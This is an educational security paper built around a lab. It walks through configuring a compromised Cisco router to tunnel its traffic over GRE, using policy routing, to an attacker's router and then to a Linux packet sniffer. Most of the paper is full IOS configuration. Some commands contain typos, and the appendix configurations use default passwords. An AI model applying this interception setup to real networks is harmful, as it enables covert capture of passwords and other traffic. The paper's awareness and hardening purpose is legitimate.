文章作者:William M. Hidalgo redkommie<@>gmail.com
.: Contents :.
I. INTRODUCTION
- Disclaimer
- About
- References
II. GETTING STARTED
- Outline
- Equipment
III. CONFIGURATION
- Routers
- Linux Host
IV. TESTING
V. CONCLUSION
APPENDIX
- Cloud Router Configuration
- Victim Router Configuration
- Attacker Router Configuration
.: I. INTRODUCTION :.
[-=] Disclaimer [=-]
The use of this document is for educational purposes only. Any misuse of this
document is the responsibility of the reader.
[-=] About [=-]
The purpose of this paper is to demonstrate that it is possible to use a
compromised Cisco router to act as a network traffic sniffer by utilizing
GRE tunnels and policy routing. This of course is only possible if the border
router or any other router were to be fully compromised.
[-=] References [=-]
The following articles were used as reference material.
- Things to do in Cisco Land when you are dead
http://www.phrack.com/show.php?p=56&a=10
- Red Team Assessment of Parliament Hill Firewall
http://www.giac.org/practical/Joshua_Wright_GCIH.zip
- Using a compromised Router to Capture Network Traffic
http://www.geocities.com/david_taylor_au
.: II. GETTING STARTED :.
[-=] Outline [=-]
The goal is to create a GRE tunnel between two routers (one the attacker and
the other the victim) and use policy routing to send traffic from the Victim
router to the Attacker router and have the Attacker router policy route the
traffic to a Linux host, which will act as the sniffer, inside the attackers
network. The traffic that is to be redirected must be matched using an
access-list and traffic flow in and out of the victims network must remain
active.
The reason for using GRE tunnels is to create a logical 'one hop' distance from
the Attacker router to the Victim router. Once this is done the
'set ip next-hop <ip_address>' command can be used to redirect traffic to the
Attacker router.
[-=] Equipment [=-]
The following equipment was used to perform this test:
- Three Cisco 2600 routers
- Two Cisco 2950 switches
- Windows XP workstation
- Workstation running the Auditor Security Collection CD
(Auditor CD -
http://www.remote-exploit.org)
.: III. CONFIGURATION :.
[-=] Routers [=-]
Configure all three routers with a basic configuration. Use the following
diagram as reference in configuring and cabling <INSERT IMAGE> (Note: The
Attacker router has a secondary IP address in its fastethernet interface). For
the Cloud Router use the configuration provided at the end of the document in
the Appendix.
-= Use the network diagram as a reference throughout the document. =-
Now begins the configuration of the GRE tunnels. First we will configure the
Victim router:
-=Victim Router=-
Victim(config)#interface tunnel0
Victim(config-if)#ip address 192.168.10.1 255.255.255.0
Victim(config-if)#tunnel source Serial0/0
Victim(config-if)#tunnel destination 199.6.6.2
Victim(config-if)#tunnel mode gre ip
Now likewise on the Attacker router.
-=Attacker Router=-
Attacker(config)#interface tunnel0
Attacker(config-if)#ip address 192.168.10.2 255.255.255.0
Attacker(config-if)#tunnel source Serial0/1
Attacker(config-if)#tunnel destination 201.100.11.1
Attacker(config-if)#tunnel mode gre ip
Now ping the tunnel interface IP addresses to confirm connectivity. If the
pings are successful on to configuring policy routing. An access-list will be
used to match the traffic we want to send through the tunnel for this test I
had the access-list match all traffic. The access-list can be configured to
match specific traffic only like snmp, telnet, or any other traffic you desire.
-=Victim Router=-
Victim(config)#access-list 101 permit ip any any
Victim(config)#router-map divert-traffic
Victim(config-route-map)#match ip address 101
Victim(config-route-map)#set ip next-hop 192.168.10.2
Victim(config-route-map)#exit
Victim(config)#interface FastEthernet0/0
Victim(config-if)#ip policy route-map divert-traffic
The Attacker router now.
-=Attacker Router=-
Attacker(config)#access-list 101 permit ip any any
Attacker(config)router-map divert-to-sniffer
Attacker(config-route-map)#match ip address 101
Attacker(config-route-map)#set ip next-hop 192.168.3.5
Attacker(config-route-map)#exit
Attacker(config)#interface tunnel0
Attacker(config-if)#ip policy route-map divert-to-sniffer
Attacker(config-if)#exit
Attacker(config-if)route-map divert-out
Attacker(config-route-map)#match ip address 101
Attacker(config-route-map)#set ip next-hop 192.168.10.1
This concludes configuring the routers.
[-=] Linux Workstation [=-]
The Linux Workstation must have two network interface cards. One interface will
accept the traffic and the other will send it back out. This must be done to
keep from creating a DoS on the victim network.
You can use any Linux distro you like but I recommend using the Auditor
Security Collection Linux distro. Download and create a copy of the Auditor
Security Collection CD once that is done boot of the CD. For more information
on the Auditor CD go to
http://www.remote-exploit.org.
Configure the interfaces with the following IP and gateway addresses:
[eth0]
IP: 192.168.3.5
Netmask: 255.255.255.0
Gateway: 192.168.3.1
[eth1]
IP: 192.168.4.5
Netmask: 255.255.255.0
Gateway: 192.168.4.1
The incoming interface will be eth1 and the outgoing will be eth0. In order for
traffic to be forwarded out IP forwarding must be enabled to do this type:
echo 1 > /proc/sys/net/ipv4/ip_forward
Failing to do this will result in a DoS of the Victim network.
[-=] Windows Workstation [=-]
Configure the workstation with the IP and gateway of:
IP: 192.168.1.5
Netmask: 255.255.255.0
Gateway: 192.168.1.1
.: IV. TESTING :.
On the Linux workstation run a packet sniffing program, preferably Ethereal,
and start packet capture. From the Windows workstation ping an interface from
the Cloud Router and make sure that it is successful now check your Linux
workstation the packet capture program should see the ping request. All traffic
sent out of the Victim router will be seen.
.: V. CONCLUSION :.
It has been proved that a router can be turned into a network sniffer with a
few commands. SNMP strings, passwords, etc. can now be captured and used to
escalate an intruders attack on the network. I hope this document will create
greater awareness on the threat that exists if a router is compromised. For
information on hardening Cisco routers visit the NSA site and download the
Router Security Guide at
http://www.nsa.gov/snac/downloads_all.cfm
.: APPENDIX :.
-=Cloud Router Configuration=-
hostname Cloud
enable secret class
interface Serial0/0
ip address 201.100.11.2 255.255.255.0
clockrate 56000
interface Serial0/1
ip address 199.6.6.1 255.255.255.0
router rip
network 199.6.6.0
network 201.100.11.0
line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login
-=Victim Router Configuration=-
hostname Victim
enable secret class
interface Tunnel0
ip address 192.168.10.1 255.255.255.0
tunnel source Serial0/0
tunnel destination 199.6.6.2
interface FastEthernet0/0
ip address 192.168.1.1 255.255.255.0
ip policy route-map diver-traffic
interface Serial0/0
ip address 201.100.11.1 255.255.255.0
router rip
network 192.168.1.0
network 201.100.11.0
access-list 101 permit ip any any
route-map divert-traffic permit 10
match ip address 101
set ip next-hop 192.168.10.2
line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login
login
-=Attacker Router Configuration=-
hostname Attacker
enable secret class
interface Tunnel0
ip address 192.168.10.2 255.255.255.0
ip policy route-map divert-to-sniffer
tunnel source Serial0/1
tunnel destination 201.100.11.1
interface FastEthernet0/0
ip address 192.168.4.1 255.255.255.0 secondary
ip address 192.168.3.1 255.255.255.0
ip policy route-map divert-out
interface Serial0/1
ip address 199.6.6.2 255.255.255.0
clockrate 56000
router rip
network 192.168.3.0
network 199.6.6.0
line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login
